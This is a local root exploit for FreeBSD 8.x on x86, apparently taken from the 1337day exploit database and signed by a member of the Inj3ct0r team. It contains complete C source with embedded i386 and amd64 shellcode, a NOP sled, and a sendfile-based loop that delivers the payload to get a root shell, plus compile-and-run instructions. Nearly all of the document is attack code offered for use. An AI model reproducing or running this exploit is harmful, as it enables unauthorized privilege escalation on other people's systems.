BSD/x86 Ver. 8.x - Local Root Exploit

1. /*
2. *
3. *
4. * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
5. * 0 _ __ __ __ 1
6. * 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
7. * 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
8. * 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
9. * 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
10. * 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
11. * 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
12. * 1 \ \____/ >> Exploit database separated by exploit 0
13. * 0 \/___/ type (local, remote, DoS, etc.) 1
14. * 1 1
15. * 0 [x] Official Website: http://www.1337day.com 0
16. * 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
17. * 0 0
18. * 1 ========================================== 1
19. * 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
20. * 1 ========================================== 0
21. * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
22. * | |
23. * | BSD/x86 Ver. 8.x - Local Root Exploit |
24. * --------------------------------------------------------------------------
25. *
26. * +----------------| ABOUT ME |--------------------+
27. * NAME: TAURUS OMAR -
28. * LINE: INDEPENDENT SECURITY RESEARCHER -
29. * HOME: ACCESOILEGAL.BLOGSPOT.COM -
30. * TWITTER: @taurusomar_ -
31. * E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
32. * E-MAIL: omar-taurus[at]live[dot]com -
33. * PWNED: #ZUUU -
34. * +------------------------------------------------+
35. *
36. *
37. * +-------------------------------+
38. * Proof of CONCEPT IMAGES
39. * http://i.imgur.com/whR3E.jpg
40. * +-------------------------------+
41. * Usage:
42. * gcc 1337.c -o 1337
43. * chmod 777 1337
44. * ./1337
45. *
46. */
47.  
48. #include <stdio.h>
49. #include <string.h>
50. #include <sys/types.h>
51. #include <sys/socket.h>
52. #include <sys/uio.h>
53. #include <sys/types.h>
54. #include <sys/mman.h>
55. #include <sys/proc.h>
56. #include <fcntl.h>
57. #include <netinet/in.h>
58. #include <sys/select.h>
59. #include <sys/stat.h>
60. #include <strings.h>
61. #include <stdio.h>
62. #include <string.h>
63. #include <err.h>
64.  
65. main (int argc, char *argv[]) {
66. int s, f, k2;
67. struct sockaddr_in addr;
68. int flags;
69. char str32[]=
70. "\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d\x2f\x74\x6d\x89\xe3"
71. "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
72. "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
73. "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
74. char str64[]=
75. "\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x74\x6d\x70\x2f\x73\x68"
76. "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
77. "\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
78. "\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
79. "\xe7\x57\x52\x48\x89\xe6\x0f\x05";
80.  
81. char buf[20000];
82.  
83. char *p;
84. struct stat sb;
85. int n;
86. fd_set wset;
87. int64_t size;
88. off_t sbytes;
89. off_t sent = 0;
90. int chunk;
91. int arch = 3;
92.  
93. if (argc != 2) {
94. printf("Definiendo Arquitectura.\n");
95. return;
96. }
97.  
98. if (strcmp(argv[1], "i386") == 0)
99. arch=1;
100.  
101. if (strcmp(argv[1], "amd64") == 0)
102. arch=2;
103.  
104. if (arch == 3) {
105. printf("Arquitectura Definida i386 or amd64\n");
106. return;
107. }
108.  
109. s = socket(AF_INET, SOCK_STREAM, 0);
110. bzero(&addr, sizeof(addr));
111. addr.sin_family = AF_INET;
112. addr.sin_port = htons(7030);
113. addr.sin_addr.s_addr = inet_addr("127.0.0.1");
114.  
115. n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
116. if (n < 0)
117. warn ("fail to connect");
118.  
119. f = open("/bin/sh", O_RDONLY);
120. if (f<0)
121. warn("fail to open file");
122. n = fstat(f, &sb);
123. if (n<0)
124. warn("fstat failed");
125.  
126. size = sb.st_size;
127. chunk = 0;
128.  
129. flags = fcntl(f, F_GETFL);
130. flags |= O_NONBLOCK;
131. fcntl(f, F_SETFL, flags);
132.  
133. while (size > 0) {
134.  
135. FD_ZERO(&wset);
136. FD_SET(s, &wset);
137. n = select(f+1, NULL, &wset, NULL, NULL);
138. if (n < 0)
139. continue;
140.  
141. if (chunk > 0) {
142. sbytes = 0;
143. if (arch == 1)
144. n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
145. if (arch == 2)
146. n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
147. if (n < 0)
148. continue;
149. chunk -= sbytes;
150. size -= sbytes;
151. sent += sbytes;
152. continue;
153. }
154.  
155. chunk = 2048;
156.  
157. memset(buf, '\0', sizeof buf);
158. if (arch == 1) {
159. for (k2=0;k2<256;k2++) {
160. buf[k2] = 0x90;
161. }
162. p = buf;
163. p = p + k2;
164. memcpy(p, str32, sizeof str32);
165.  
166. n = k2 + sizeof str32;
167. p = buf;
168. }
169.  
170. if (arch == 2) {
171. for (k2=0;k2<100;k2++) {
172. buf[k2] = 0x90;
173. }
174. p = buf;
175. p = p + k2;
176. memcpy(p, str64, sizeof str64);
177.  
178. n = k2 + sizeof str64;
179. p = buf;
180. }
181.  
182. write(s, p, n);
183. }
184. }
185.  
186.  
187. # 1337day.com [2012-09-22]